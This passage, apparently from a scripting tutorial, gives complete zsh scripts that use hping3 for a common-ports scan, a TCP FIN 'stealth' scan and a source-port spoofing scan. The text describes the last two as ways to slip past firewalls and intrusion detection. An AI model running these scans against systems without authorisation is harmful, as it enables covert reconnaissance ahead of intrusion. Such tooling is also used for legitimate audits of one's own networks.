    timeout() {
        command timeout "$@"
    }
else
    # No timeout command available
    echo -e "${YELLOW}Warning: timeout command not found${NC}"
    echo "Install with: brew install coreutils"
    echo "Continuing without timeout protection..."
    echo ""
    timeout() {
        shift  # Remove timeout value
        "$@"   # Execute command directly
    }
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: TCP SYN scan requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Convert ports to array (zsh compatible)
IFS=',' PORT_ARRAY=(${=PORTS_TO_SCAN})
TOTAL_PORTS=${#PORT_ARRAY[@]}

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║      COMMON PORTS SCANNER              ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}      $TARGET"
echo -e "  ${BLUE}Scan Type:${NC}   $SCAN_DESCRIPTION"
echo -e "  ${BLUE}Total Ports:${NC} $TOTAL_PORTS"
echo -e "  ${BLUE}Threads:${NC}     $THREADS"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Resolve target
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
    TARGET_IP="$TARGET"
    echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
    echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi

# Create temporary files
TMPDIR=$(mktemp -d)
OPEN_PORTS_FILE="$TMPDIR/open_ports"
trap "rm -rf $TMPDIR" EXIT

# Start time
START_TIME=$(date +%s)

echo ""
echo -e "${GREEN}[+] Starting scan of $TOTAL_PORTS common ports...${NC}"
echo ""

# Progress tracking
SCANNED=0

# Function to update progress
show_progress() {
    local current=$1
    local total=$2
    if [ "$total" -eq 0 ]; then
        return
    fi
    local percent=$((current * 100 / total))
    printf "\r${CYAN}Progress: [%-50s] %d%% (%d/%d ports)${NC}" \
           "$(printf '#%.0s' $(seq 1 $((percent / 2))))" \
           "$percent" "$current" "$total"
}

# Main scanning loop
for port in "${PORT_ARRAY[@]}"; do
    # Remove any whitespace
    port=$(echo "$port" | tr -d ' ')
    
    # Launch scan in background
    scan_port "$TARGET_IP" "$port" "$OPEN_PORTS_FILE" &
    
    # Manage parallel jobs
    JOBS_COUNT=$(jobs -r | wc -l)
    while [ "$JOBS_COUNT" -ge "$THREADS" ]; do
        sleep 0.05
        JOBS_COUNT=$(jobs -r | wc -l)
    done
    
    # Update progress
    ((SCANNED++))
    show_progress "$SCANNED" "$TOTAL_PORTS"
done

# Wait for remaining jobs
echo -e "\n${YELLOW}[*] Waiting for remaining scans to complete...${NC}"
wait

# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))

# Process results
echo -e "\r\033[K"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}           SCAN RESULTS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Count open ports
OPEN_COUNT=0
if [ -f "$OPEN_PORTS_FILE" ]; then
    OPEN_COUNT=$(wc -l < "$OPEN_PORTS_FILE" | tr -d ' ')
fi

# Display results
if [ "$OPEN_COUNT" -gt 0 ]; then
    echo -e "${GREEN}[✓] Found $OPEN_COUNT open port(s)${NC}"
    echo ""
    echo -e "${MAGENTA}Open Ports Summary:${NC}"
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    printf "${WHITE}%-10s %-20s${NC}\n" "PORT" "SERVICE"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    # Sort and display open ports
    sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port service; do
        printf "${GREEN}%-10s${NC} ${YELLOW}%-20s${NC}\n" "$port/tcp" "$service"
    done
    
    # Group by service type
    echo ""
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    echo -e "${MAGENTA}Services by Category:${NC}"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    # Categorize services
    WEB_PORTS=""
    MAIL_PORTS=""
    DB_PORTS=""
    REMOTE_PORTS=""
    FILE_PORTS=""
    OTHER_PORTS=""
    
    while IFS=: read -r port service; do
        case $port in
            80|443|8080|8443|8000|8888|3000|5000|9000)
                WEB_PORTS="${WEB_PORTS}${port}($service) "
                ;;
            25|110|143|465|587|993|995)
                MAIL_PORTS="${MAIL_PORTS}${port}($service) "
                ;;
            1433|1521|3306|5432|6379|7000|9200|11211|27017)
                DB_PORTS="${DB_PORTS}${port}($service) "
                ;;
            22|23|3389|5900|5901|5902)
                REMOTE_PORTS="${REMOTE_PORTS}${port}($service) "
                ;;
            20|21|69|139|445|873|2049)
                FILE_PORTS="${FILE_PORTS}${port}($service) "
                ;;
            *)
                OTHER_PORTS="${OTHER_PORTS}${port}($service) "
                ;;
        esac
    done < "$OPEN_PORTS_FILE"
    
    [[ -n "$WEB_PORTS" ]] && echo -e "${BLUE}Web Services:${NC} $WEB_PORTS"
    [[ -n "$MAIL_PORTS" ]] && echo -e "${BLUE}Mail Services:${NC} $MAIL_PORTS"
    [[ -n "$DB_PORTS" ]] && echo -e "${BLUE}Database Services:${NC} $DB_PORTS"
    [[ -n "$REMOTE_PORTS" ]] && echo -e "${BLUE}Remote Access:${NC} $REMOTE_PORTS"
    [[ -n "$FILE_PORTS" ]] && echo -e "${BLUE}File Services:${NC} $FILE_PORTS"
    [[ -n "$OTHER_PORTS" ]] && echo -e "${BLUE}Other Services:${NC} $OTHER_PORTS"
    
    # Save report
    REPORT_FILE="common_ports_${TARGET}_$(date +%Y%m%d_%H%M%S).txt"
    {
        echo "Common Ports Scan Report"
        echo "========================"
        echo "Target: $TARGET ($TARGET_IP)"
        echo "Scan Type: $SCAN_DESCRIPTION"
        echo "Total Ports Scanned: $TOTAL_PORTS"
        echo "Open Ports Found: $OPEN_COUNT"
        echo "Scan Date: $(date)"
        echo "Duration: ${DURATION} seconds"
        echo ""
        echo "Open Ports:"
        echo "-----------"
        sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port service; do
            printf "%-10s %s\n" "$port/tcp" "$service"
        done
    } > "$REPORT_FILE"
    
    echo ""
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    echo -e "${BLUE}[*] Report saved to: $REPORT_FILE${NC}"
else
    echo -e "${YELLOW}[-] No open ports found${NC}"
    echo -e "${YELLOW}    Possible reasons:${NC}"
    echo -e "${YELLOW}    • All scanned ports are closed${NC}"
    echo -e "${YELLOW}    • Firewall is blocking connections${NC}"
    echo -e "${YELLOW}    • Target is down or unreachable${NC}"
fi

# Display statistics
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}           STATISTICS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "  ${BLUE}Ports Scanned:${NC}  $TOTAL_PORTS"
echo -e "  ${GREEN}Open Ports:${NC}     $OPEN_COUNT"
if [ "$TOTAL_PORTS" -gt 0 ]; then
    echo -e "  ${RED}Success Rate:${NC}   $(( OPEN_COUNT * 100 / TOTAL_PORTS ))%"
else
    echo -e "  ${RED}Success Rate:${NC}   N/A"
fi
echo -e "  ${BLUE}Scan Duration:${NC}  ${DURATION} seconds"
if [ "$TOTAL_PORTS" -gt 0 ]; then
    echo -e "  ${BLUE}Scan Rate:${NC}      ~$(( TOTAL_PORTS / (DURATION + 1) )) ports/sec"
else
    echo -e "  ${BLUE}Scan Rate:${NC}      N/A"
fi
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Provide recommendations
if [ "$OPEN_COUNT" -gt 0 ]; then
    echo ""
    echo -e "${YELLOW}Security Recommendations:${NC}"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    # Check for risky services
    if grep -q "23:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${RED}⚠ Telnet (port 23) is insecure - use SSH instead${NC}"
    fi
    if grep -q "21:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${YELLOW}⚠ FTP (port 21) transmits credentials in plaintext${NC}"
    fi
    if grep -q "139:\|445:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${YELLOW}⚠ SMB/NetBIOS ports are exposed - ensure proper access controls${NC}"
    fi
    if grep -q "3389:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${YELLOW}⚠ RDP (port 3389) is exposed - use VPN or restrict access${NC}"
    fi
    if grep -q "3306:\|5432:\|1433:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${YELLOW}⚠ Database ports are exposed - should not be publicly accessible${NC}"
    fi
fi

echo ""
exit 0
EOF

chmod +x ./common_ports_scan.sh

How to Run:

# Scan default common ports
./common_ports_scan.sh example.com

# Scan web server ports
./common_ports_scan.sh example.com web

# Scan database ports
./common_ports_scan.sh example.com database

# Scan top 100 ports
./common_ports_scan.sh example.com top100

# Scan top 1000 ports with 100 threads
./common_ports_scan.sh example.com top1000 100

# Custom port list
./common_ports_scan.sh example.com "22,80,443,3306,8080"

# Get help
./common_ports_scan.sh --help

Default Ports Included:
– **21**: FTP (File Transfer Protocol)
– **22**: SSH (Secure Shell)
– **23**: Telnet
– **25**: SMTP (Simple Mail Transfer Protocol)
– **53**: DNS (Domain Name System)
– **80**: HTTP (Hypertext Transfer Protocol)
– **443**: HTTPS (HTTP Secure)
– **3306**: MySQL Database
– **3389**: RDP (Remote Desktop Protocol)
– **5432**: PostgreSQL Database

Script 6: Stealth FIN Scanner

Purpose:


Performs FIN scanning, a stealth technique that sends TCP packets with only the FIN flag set. This can bypass some firewalls and intrusion detection systems that only monitor SYN packets.

Create the Script:

cat > ./fin_scan.sh << 'EOF'
#!/bin/zsh

# TCP FIN Scanner using hping3
# Performs stealthy FIN scans to detect firewall rules and port states
# FIN scanning is a stealth technique that may bypass some firewalls
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
WHITE='\033[1;37m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
PORT_SPEC="${2:-80}"
COUNT="${3:-2}"
DELAY="${4:-1}"

# Function to print usage
print_usage() {
    local script_name="./fin_scan.sh"
    echo "Usage: $script_name <target> [port|port_range] [count] [delay]"
    echo ""
    echo "Parameters:"
    echo "  target      - Hostname or IP address to scan"
    echo "  port        - Single port or range (e.g., 80 or 80-90)"
    echo "  count       - Number of FIN packets per port (default: 2)"
    echo "  delay       - Delay between packets in seconds (default: 1)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com                # Scan port 80"
    echo "  $script_name example.com 443            # Scan port 443"
    echo "  $script_name example.com 80-85          # Scan ports 80-85"
    echo "  $script_name 192.168.1.1 22 3 0.5       # 3 packets, 0.5s delay"
    echo ""
    echo "FIN Scan Technique:"
    echo "  - Sends TCP packets with only FIN flag set"
    echo "  - CLOSED ports respond with RST"
    echo "  - OPEN ports typically don't respond (stealth)"
    echo "  - FILTERED ports may send ICMP or no response"
    echo ""
    echo "Response Interpretation:"
    echo "  RST received    = Port is CLOSED"
    echo "  No response     = Port is likely OPEN or FILTERED"
    echo "  ICMP received   = Port is FILTERED by firewall"
}

# Function to validate port
validate_port() {
    local port=$1
    if ! [[ "$port" =~ ^[0-9]+$ ]]; then
        return 1
    fi
    if [ "$port" -lt 1 ] || [ "$port" -gt 65535 ]; then
        return 1
    fi
    return 0
}

# Function to get service name
get_service_name() {
    local port=$1
    # Trim any whitespace from port number
    port=$(echo "$port" | tr -d ' ')
    # Common services
    case $port in
        21) echo "FTP" ;;
        22) echo "SSH" ;;
        23) echo "Telnet" ;;
        25) echo "SMTP" ;;
        53) echo "DNS" ;;
        80) echo "HTTP" ;;
        110) echo "POP3" ;;
        143) echo "IMAP" ;;
        443) echo "HTTPS" ;;
        445) echo "SMB" ;;
        3306) echo "MySQL" ;;
        3389) echo "RDP" ;;
        5432) echo "PostgreSQL" ;;
        6379) echo "Redis" ;;
        8080) echo "HTTP-Alt" ;;
        8443) echo "HTTPS-Alt" ;;
        27017) echo "MongoDB" ;;
        *)
            # Try system services
            local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
            if [[ -n "$service" ]]; then
                echo "$service"
            else
                echo "Unknown"
            fi
            ;;
    esac
}

# Function to perform FIN scan on a single port
scan_port() {
    local target=$1
    local port=$2
    local count=$3
    local delay=$4
    
    local service=$(get_service_name "$port")
    echo ""
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    echo -e "${BLUE}Scanning Port:${NC} $port/tcp ($service)"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    local responses=0
    local rst_count=0
    local icmp_count=0
    local no_response=0
    
    for i in $(seq 1 $count); do
        echo -e "${YELLOW}[→] Sending FIN packet $i/$count to port $port...${NC}"
        
        # Run hping3 with FIN flag
        local result=$(hping3 -F -p "$port" -c 1 "$target" 2>&1)
        
        # Analyze response
        if echo "$result" | grep -q "flags=RA\|flags=R"; then
            echo -e "${RED}[←] RST received - Port $port is CLOSED${NC}"
            ((rst_count++))
            ((responses++))
        elif echo "$result" | grep -q "ICMP"; then
            echo -e "${YELLOW}[←] ICMP received - Port $port is FILTERED${NC}"
            ((icmp_count++))
            ((responses++))
        elif echo "$result" | grep -q "timeout\|100% packet loss"; then
            echo -e "${GREEN}[◊] No response - Port $port may be OPEN or heavily FILTERED${NC}"
            ((no_response++))
        else
            # Check for any other response
            if echo "$result" | grep -q "len="; then
                echo -e "${BLUE}[←] Unexpected response received${NC}"
                ((responses++))
            else
                echo -e "${GREEN}[◊] No response - Port $port may be OPEN${NC}"
                ((no_response++))
            fi
        fi
        
        # Add delay between packets
        if [ "$i" -lt "$count" ] && [ "$delay" != "0" ]; then
            sleep "$delay"
        fi
    done
    
    # Port state analysis
    echo ""
    echo -e "${CYAN}Port $port Analysis:${NC}"
    echo -e "  Packets sent: $count"
    echo -e "  RST responses: $rst_count"
    echo -e "  ICMP responses: $icmp_count"
    echo -e "  No responses: $no_response"
    
    # Determine likely port state
    if [ "$rst_count" -gt 0 ]; then
        echo -e "  ${RED}▸ Verdict: Port $port is CLOSED${NC}"
    elif [ "$icmp_count" -gt 0 ]; then
        echo -e "  ${YELLOW}▸ Verdict: Port $port is FILTERED (firewall blocking)${NC}"
    elif [ "$no_response" -eq "$count" ]; then
        echo -e "  ${GREEN}▸ Verdict: Port $port is likely OPEN or silently FILTERED${NC}"
        echo -e "  ${CYAN}  Note: No response to FIN often indicates OPEN port${NC}"
    else
        echo -e "  ${BLUE}▸ Verdict: Port $port state is UNCERTAIN${NC}"
    fi
    
    return $responses
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Parse port specification (single port or range)
START_PORT=""
END_PORT=""

if [[ "$PORT_SPEC" =~ ^([0-9]+)-([0-9]+)$ ]]; then
    # Port range (zsh compatible)
    START_PORT="${match[1]}"
    END_PORT="${match[2]}"
    
    # Validate range
    if ! validate_port "$START_PORT" || ! validate_port "$END_PORT"; then
        echo -e "${RED}Error: Invalid port range${NC}"
        exit 1
    fi
    
    if [ "$START_PORT" -gt "$END_PORT" ]; then
        echo -e "${RED}Error: Start port must be less than or equal to end port${NC}"
        exit 1
    fi
elif [[ "$PORT_SPEC" =~ ^[0-9]+$ ]]; then
    # Single port
    if ! validate_port "$PORT_SPEC"; then
        echo -e "${RED}Error: Port must be between 1-65535${NC}"
        exit 1
    fi
    START_PORT="$PORT_SPEC"
    END_PORT="$PORT_SPEC"
else
    echo -e "${RED}Error: Invalid port specification${NC}"
    echo "Use a single port (e.g., 80) or range (e.g., 80-90)"
    exit 1
fi

# Validate count
if ! [[ "$COUNT" =~ ^[0-9]+$ ]] || [ "$COUNT" -lt 1 ]; then
    echo -e "${RED}Error: Count must be a positive number${NC}"
    exit 1
fi

# Validate delay
if ! [[ "$DELAY" =~ ^[0-9]*\.?[0-9]+$ ]]; then
    echo -e "${RED}Error: Delay must be a number${NC}"
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: FIN scan requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Calculate total ports
TOTAL_PORTS=$((END_PORT - START_PORT + 1))

# Display header
echo -e "${MAGENTA}╔════════════════════════════════════════╗${NC}"
echo -e "${MAGENTA}║         TCP FIN SCANNER                ║${NC}"
echo -e "${MAGENTA}║      (Stealth Scan Technique)          ║${NC}"
echo -e "${MAGENTA}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}         $TARGET"
if [ "$START_PORT" -eq "$END_PORT" ]; then
    echo -e "  ${BLUE}Port:${NC}           $START_PORT"
else
    echo -e "  ${BLUE}Port Range:${NC}     $START_PORT-$END_PORT ($TOTAL_PORTS ports)"
fi
echo -e "  ${BLUE}Packets/Port:${NC}   $COUNT"
echo -e "  ${BLUE}Packet Delay:${NC}   ${DELAY}s"
echo -e "  ${BLUE}Scan Type:${NC}      TCP FIN (Stealth)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Resolve target
echo ""
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
    TARGET_IP="$TARGET"
    echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
    echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi

# Start time
START_TIME=$(date +%s)

echo ""
echo -e "${GREEN}[+] Starting FIN scan...${NC}"
echo -e "${CYAN}[i] FIN scan sends TCP packets with only the FIN flag set${NC}"
echo -e "${CYAN}[i] This technique may bypass some packet filters and IDS${NC}"

# Results tracking
declare -A PORT_STATES
OPEN_PORTS=""
CLOSED_PORTS=""
FILTERED_PORTS=""

# Main scanning loop
for port in $(seq $START_PORT $END_PORT); do
    scan_port "$TARGET_IP" "$port" "$COUNT" "$DELAY"
    
    # Store result based on responses
    if [ $? -eq 0 ]; then
        # No responses likely means open
        OPEN_PORTS="${OPEN_PORTS}$port "
        PORT_STATES[$port]="OPEN/FILTERED"
    fi
done

# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))

# Generate summary report
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}         SCAN SUMMARY${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Count results
OPEN_COUNT=$(echo "$OPEN_PORTS" | wc -w | tr -d ' ')
CLOSED_COUNT=$(echo "$CLOSED_PORTS" | wc -w | tr -d ' ')
FILTERED_COUNT=$(echo "$FILTERED_PORTS" | wc -w | tr -d ' ')

echo -e "${BLUE}Scan Results:${NC}"
echo -e "  Total Ports Scanned: $TOTAL_PORTS"
echo -e "  Likely Open/Filtered: $OPEN_COUNT"
echo -e "  Confirmed Closed: $CLOSED_COUNT"
echo -e "  Confirmed Filtered: $FILTERED_COUNT"
echo -e "  Scan Duration: ${DURATION} seconds"

if [ "$OPEN_COUNT" -gt 0 ]; then
    echo ""
    echo -e "${GREEN}Potentially Open Ports:${NC}"
    for port in $OPEN_PORTS; do
        service=$(get_service_name "$port")
        echo -e "  ${GREEN}▸${NC} Port $port/tcp - $service"
    done
fi

# Save report to file
REPORT_FILE="fin_scan_${TARGET}_$(date +%Y%m%d_%H%M%S).txt"
{
    echo "TCP FIN Scan Report"
    echo "==================="
    echo "Target: $TARGET ($TARGET_IP)"
    echo "Port Range: $START_PORT-$END_PORT"
    echo "Scan Date: $(date)"
    echo "Duration: ${DURATION} seconds"
    echo "Technique: TCP FIN (Stealth Scan)"
    echo ""
    echo "Results:"
    echo "--------"
    echo "Likely Open/Filtered: $OPEN_COUNT"
    echo "Confirmed Closed: $CLOSED_COUNT"
    echo "Confirmed Filtered: $FILTERED_COUNT"
    
    if [ "$OPEN_COUNT" -gt 0 ]; then
        echo ""
        echo "Potentially Open Ports:"
        for port in $OPEN_PORTS; do
            service=$(get_service_name "$port")
            echo "  Port $port/tcp - $service"
        done
    fi
} > "$REPORT_FILE"

echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${BLUE}[*] Report saved to: $REPORT_FILE${NC}"
echo ""
echo -e "${YELLOW}Important Notes:${NC}"
echo -e "${CYAN}• FIN scanning is a stealth technique${NC}"
echo -e "${CYAN}• No response often indicates an OPEN port${NC}"
echo -e "${CYAN}• RST response indicates a CLOSED port${NC}"
echo -e "${CYAN}• Results may vary based on firewall rules${NC}"
echo -e "${CYAN}• Some systems may not follow RFC standards${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit 0
EOF

chmod +x ./fin_scan.sh

How to Run:

# Scan default port 80
./fin_scan.sh example.com

# Scan specific port
./fin_scan.sh example.com 443

# Scan port range
./fin_scan.sh example.com 80-85

# Custom parameters
./fin_scan.sh 192.168.1.1 22 3 0.5

# Quick single packet scan
./fin_scan.sh server.com 80-443 1 0

# Get help
./fin_scan.sh --help

Response Interpretation:
– **No response**: Port likely open (or filtered)
– **RST response**: Port closed
– **ICMP unreachable**: Port filtered

Script 7: Source Port Spoofing

Purpose:
Modifies the source port of outgoing packets to bypass firewall rules that allow traffic from specific “trusted” ports like DNS (53) or FTP-DATA (20).

Create the Script:

cat > ./source_port_scan.sh << 'EOF'
#!/bin/zsh

# Source Port Spoofing Scanner using hping3
# Attempts to bypass firewalls that trust certain source ports
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
NC='\033[0m' # No Color

# Parse arguments early
TARGET="$1"
DEST_PORT="${2:-80}"
SOURCE_PORT="${3:-53}"
COUNT="${4:-1}"

# Function to print usage
print_usage() {
    local script_name="./source_port_scan.sh"
    echo "Usage: $script_name <target> [dest_port] [source_port] [count]"
    echo ""
    echo "Parameters:"
    echo "  target       - Hostname or IP address to scan"
    echo "  dest_port    - Destination port to scan (default: 80)"
    echo "  source_port  - Source port to spoof (default: 53)"
    echo "  count        - Number of packets to send (default: 1)"
    echo ""
    echo "Common trusted source ports:"
    echo "  53 (DNS), 20 (FTP-DATA), 123 (NTP), 67/68 (DHCP)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com                  # Scan port 80 from source port 53"
    echo "  $script_name example.com 443               # Scan port 443 from source port 53"
    echo "  $script_name example.com 80 20             # Scan port 80 from source port 20"
    echo "  $script_name example.com 80 53 3           # Send 3 packets"
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: Source port scan requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Map common source ports to names
declare -A source_services
source_services[53]="DNS"
source_services[20]="FTP-DATA"
source_services[123]="NTP"
source_services[67]="DHCP"
source_services[68]="DHCP"
source_services[88]="Kerberos"
source_services[500]="IKE/IPSec"

SERVICE_NAME=${source_services[$SOURCE_PORT]:-"Custom"}

# Display header
echo -e "${MAGENTA}╔════════════════════════════════════════╗${NC}"
echo -e "${MAGENTA}║    SOURCE PORT SPOOFING SCANNER       ║${NC}"
echo -e "${MAGENTA}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}         $TARGET:$DEST_PORT"
echo -e "  ${BLUE}Source Port:${NC}    $SOURCE_PORT ($SERVICE_NAME)"
echo -e "  ${BLUE}Packet Count:${NC}   $COUNT"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
echo -e "${YELLOW}[*] Attempting to bypass firewall rules that trust source port $SOURCE_PORT${NC}"
echo -e "${CYAN}[i] Some firewalls allow traffic from 'trusted' source ports${NC}"
echo ""

# Resolve target
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
    TARGET_IP="$TARGET"
    echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
    echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi

echo ""
echo -e "${GREEN}[+] Starting source port spoofing scan...${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

OPEN_COUNT=0
CLOSED_COUNT=0
FILTERED_COUNT=0

for i in $(seq 1 $COUNT); do
    echo -e "${CYAN}[→] Sending SYN packet $i/$COUNT from port $SOURCE_PORT...${NC}"
    result=$(hping3 -S -p $DEST_PORT -s $SOURCE_PORT -c 1 $TARGET_IP 2>&1)
    
    if echo "$result" | grep -q "flags=SA\|flags=S\.A"; then
        echo -e "${GREEN}[✓] Port $DEST_PORT appears OPEN (SYN+ACK received)${NC}"
        echo -e "${GREEN}    → Source port spoofing may have bypassed filtering!${NC}"
        ((OPEN_COUNT++))
    elif echo "$result" | grep -q "flags=RA\|flags=R"; then
        echo -e "${RED}[✗] Port $DEST_PORT appears CLOSED (RST received)${NC}"
        ((CLOSED_COUNT++))
    elif echo "$result" | grep -q "ICMP"; then
        icmp_type=$(echo "$result" | grep -oE "ICMP [^,]+" | head -1)
        echo -e "${YELLOW}[!] ICMP response received: $icmp_type${NC}"
        echo -e "${YELLOW}    → Port is likely FILTERED by firewall${NC}"
        ((FILTERED_COUNT++))
    elif echo "$result" | grep -q "100% packet loss\|timeout"; then
        echo -e "${YELLOW}[?] No response - Port $DEST_PORT may be FILTERED${NC}"
        ((FILTERED_COUNT++))
    else
        # Check for any response
        if echo "$result" | grep -q "len="; then
            echo -e "${BLUE}[←] Unexpected response received${NC}"
            echo "$result" | grep "len=" | head -1
        else
            echo -e "${YELLOW}[?] No response - Port $DEST_PORT may be FILTERED${NC}"
            ((FILTERED_COUNT++))
        fi
    fi
    
    if [ "$i" -lt "$COUNT" ]; then
        sleep 0.5
    fi
done

echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}         SCAN SUMMARY${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
echo -e "${BLUE}Target:${NC} $TARGET ($TARGET_IP)"
echo -e "${BLUE}Port Scanned:${NC} $DEST_PORT"
echo -e "${BLUE}Source Port Used:${NC} $SOURCE_PORT ($SERVICE_NAME)"
echo ""

if [ "$OPEN_COUNT" -gt 0 ]; then
    echo -e "${GREEN}▸ Verdict: Port $DEST_PORT is OPEN${NC}"
    echo -e "${GREEN}  ✓ Source port $SOURCE_PORT successfully bypassed filtering!${NC}"
    echo -e "${YELLOW}  ⚠ Warning: Firewall may be misconfigured to trust port $SOURCE_PORT${NC}"
